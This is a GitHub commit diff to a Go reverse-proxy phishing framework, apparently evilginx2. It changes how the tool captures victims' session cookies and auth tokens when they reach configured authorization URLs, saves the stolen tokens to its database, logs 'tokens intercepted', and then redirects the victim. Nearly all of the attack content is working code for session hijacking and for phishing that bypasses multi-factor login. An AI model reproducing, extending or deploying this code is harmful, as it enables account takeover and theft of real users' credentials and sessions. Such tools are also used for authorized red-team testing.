response cookies are now properly captured for requests to �uth_urls …

…triggers
bytebounty · Nov 12, 2018 · 98facd8 · 98facd8
1 parent 005b880
commit 98facd8
Show file tree

Hide file tree

Showing 3 changed files with 43 additions and 21 deletions.
diff --git a/core/banner.go b/core/banner.go
@@ -8,7 +8,7 @@ import (
 )
 
 const (
-	VERSION = "2.1.0"
+	VERSION = "2.2.0"
 )
 
 func putAsciiArt(s string) {

diff --git a/core/http_proxy.go b/core/http_proxy.go
@@ -297,25 +297,6 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 				}
 				req.Header.Set(string(e), e_host)
 
-				if pl != nil && len(pl.authUrls) > 0 && ps.SessionId != "" {
-					s, ok := p.sessions[ps.SessionId]
-					if ok && !s.IsDone {
-						for _, au := range pl.authUrls {
-							if au.MatchString(req.URL.Path) {
-								err := p.db.SetSessionTokens(ps.SessionId, s.Tokens)
-								if err != nil {
-									log.Error("database: %v", err)
-								}
-								s.IsDone = true
-								if err == nil {
-									log.Success("[%d] detected authorization URL - tokens intercepted: %s", ps.Index, req.URL.Path)
-								}
-								break
-							}
-						}
-					}
-				}
-
 				if ps.SessionId != "" && origin == "" {
 					s, ok := p.sessions[ps.SessionId]
 					if ok {
@@ -329,6 +310,19 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 						}
 					}
 				}
+
+				if pl != nil && len(pl.authUrls) > 0 && ps.SessionId != "" {
+					s, ok := p.sessions[ps.SessionId]
+					if ok && !s.IsDone {
+						for _, au := range pl.authUrls {
+							if au.MatchString(req.URL.Path) {
+								s.IsDone = true
+								s.IsAuthUrl = true
+								break
+							}
+						}
+					}
+				}
 			}
 
 			return req, nil
@@ -397,7 +391,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 					log.Debug("%s: %s = %s", c_domain, ck.Name, ck.Value)
 					if pl.isAuthToken(c_domain, ck.Name) {
 						s, ok := p.sessions[ps.SessionId]
-						if ok && !s.IsDone {
+						if ok && (s.IsAuthUrl || !s.IsDone) {
 							if ck.Value != "" { // cookies with empty values are of no interest to us
 								is_auth = s.AddAuthToken(c_domain, ck.Name, ck.Value, ck.Path, ck.HttpOnly, auth_tokens)
 								if len(pl.authUrls) > 0 {
@@ -472,6 +466,32 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 				}
 			}
 
+			if pl != nil && len(pl.authUrls) > 0 && ps.SessionId != "" {
+				s, ok := p.sessions[ps.SessionId]
+				if ok && s.IsDone {
+					for _, au := range pl.authUrls {
+						if au.MatchString(resp.Request.URL.Path) {
+							err := p.db.SetSessionTokens(ps.SessionId, s.Tokens)
+							if err != nil {
+								log.Error("database: %v", err)
+							}
+							if err == nil {
+								log.Success("[%d] detected authorization URL - tokens intercepted: %s", ps.Index, resp.Request.URL.Path)
+							}
+							if s.IsDone && s.RedirectURL != "" {
+								log.Important("[%d] redirecting to URL: %s", ps.Index, s.RedirectURL)
+								resp := goproxy.NewResponse(resp.Request, "text/html", http.StatusFound, "")
+								if resp != nil {
+									resp.Header.Add("Location", s.RedirectURL)
+									return resp
+								}
+							}
+							break
+						}
+					}
+				}
+			}
+
 			return resp
 		})
 

diff --git a/core/session.go b/core/session.go
@@ -12,6 +12,7 @@ type Session struct {
 	Tokens      map[string]map[string]*database.Token
 	RedirectURL string
 	IsDone      bool
+	IsAuthUrl   bool
 }
 
 func NewSession(name string) (*Session, error) {
@@ -22,6 +23,7 @@ func NewSession(name string) (*Session, error) {
 		Password:    "",
 		RedirectURL: "",
 		IsDone:      false,
+		IsAuthUrl:   false,
 	}
 	s.Tokens = make(map[string]map[string]*database.Token)
-Original file line number
+Diff line change
@@ Expand Up / @@ -8,7 +8,7 @@ import ( @@
     )
     const (
-    	VERSION = "2.1.0"
+    	VERSION = "2.2.0"
     )
     func putAsciiArt(s string) {
@@ Expand Down @@